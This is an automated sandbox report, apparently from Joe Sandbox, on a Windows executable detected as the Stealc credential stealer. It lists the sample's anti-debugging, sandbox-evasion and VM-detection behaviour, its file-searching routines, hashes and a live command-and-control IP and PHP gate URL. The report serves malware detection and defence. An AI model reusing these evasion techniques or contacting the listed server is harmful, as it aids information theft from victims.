                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149C6D6 second address: 149C6DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149C6DC second address: 149C6E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F801E8 second address: F80229 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE903A971h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFAE903A96Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov cx, bx 0x00000014 mov eax, ebx 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FFAE903A972h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F802A3 second address: F802B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE9061D6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F802B2 second address: F8034A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 jmp 00007FFAE903A96Bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FFAE903A974h 0x00000016 sub cl, FFFFFFD8h 0x00000019 jmp 00007FFAE903A96Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FFAE903A978h 0x00000025 sbb ch, 00000038h 0x00000028 jmp 00007FFAE903A96Bh 0x0000002d popfd 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 mov al, DBh 0x00000034 movsx ebx, ax 0x00000037 popad 0x00000038 pop ebp 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FFAE903A976h 0x00000040 sub ah, FFFFFFC8h 0x00000043 jmp 00007FFAE903A96Bh 0x00000048 popfd 0x00000049 push eax 0x0000004a push edx 0x0000004b push esi 0x0000004c pop edx 0x0000004d rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1201A78 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13ADDE5 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13B7FCC instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1442BE9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00FB38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FB4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00FADA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FAE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00FAE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00FB4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FAED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00FAED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FA16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FAF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FAF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00FB3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00FABE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FADE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA1160 GetSystemInfo,ExitProcess,0_2_00FA1160
                Source: file.exe, file.exe, 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareF
                Source: file.exe, 00000000.00000002.1746507563.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746507563.0000000000933000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746507563.00000000008F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13731
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13734
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13750
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13785
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13746
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA45C0 VirtualProtect ?,00000004,00000100,000000000_2_00FA45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FB9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB9750 mov eax, dword ptr fs:[00000030h]0_2_00FB9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00FB78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7048, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00FB9600
                Source: file.exe, file.exe, 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00FB7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00FB7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00FB7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00FB7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.fa0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1706081897.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7048, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.fa0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1706081897.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7048, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/?2file.exe, 00000000.00000002.1746507563.0000000000906000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.php)2file.exe, 00000000.00000002.1746507563.0000000000906000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.php3/file.exe, 00000000.00000002.1746507563.00000000008F4000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37LjG30Sfile.exe, 00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37file.exe, 00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpw/file.exe, 00000000.00000002.1746507563.00000000008F4000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.phpffile.exe, 00000000.00000002.1746507563.0000000000933000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.37/e2b1563c6670f193.php$file.exe, 00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown
                              http://185.215.113.37/e2b1563c6670f193.phpa-7368302a1ad4file.exe, 00000000.00000002.1746507563.0000000000906000.00000004.00000020.00020000.00000000.sdmptrue
                                		unknown
                                http://185.215.113.37/e2b1563c6670f193.phpu2file.exe, 00000000.00000002.1746507563.0000000000906000.00000004.00000020.00020000.00000000.sdmptrue
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.215.113.37
                                  		unknownPortugal
                                  		206894WHOLESALECONNECTIONSNLtrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1529173
                                  Start date and time:2024-10-08 17:31:06 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 2s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:1
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 81%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 89
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated

                                  Warnings

                                  • VT rate limit hit for: file.exe

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37/e2b1563c6670f193.php

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  No created / dropped files found

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.945648026711068
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:1'885'184 bytes
                                  MD5:1666bdf952c77a910f9c69f491d5cc4b
                                  SHA1:e761daca0c544764e242bc6a2c17cbedc8c15c8c
                                  SHA256:4996064a6dc50f76d60d6aa783d5baafa7260930c0318f0762ba5c64f67ced64
                                  SHA512:bcc567d7b389dbcd486dc2503a50d87717b75d9bb3e492e72766890ff8a4afd35ad06e39dd927c440266bbbc33a8f7670f6bbdc2ad441fa6a726996c3218b103
                                  SSDEEP:49152:Cusg7gWxD4Blg2OqyjuAZPPoijrNarcQuo0SsEUml+3S:CuBEWmW2O9uWoqRIcHEo
                                  TLSH:DC9533E12D53C230D607F07E826B5FE75B69B0D3DD64D8E46F5A33381A6508AFB181A8
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                                  File Icon

                                  Icon Hash:90cececece8e8eb0

                                  Static PE Info

                                  General

                                  Entrypoint:0xab1000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                  Entrypoint Preview

                                  Instruction
                                  jmp 00007FFAE8AEEF3Ah
                                  cpuid
                                  sbb al, 00h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  jmp 00007FFAE8AF0F35h
                                  add byte ptr [ebx], al
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], dh
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax+00000000h], al
                                  add byte ptr [eax], al
                                  add byte ptr [edx], ah
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edi], al
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add ecx, dword ptr [edx]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add al, 0Ah
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  mov cl, 80h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  xor byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add al, 00h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  and al, 00h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add dword ptr [eax+00000000h], eax
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  pop es
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], dh
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [ecx], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [ecx], al
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Rich Headers

                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x25b0000x2280097b3c5a2f7f6c171ad17716d6a54532funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
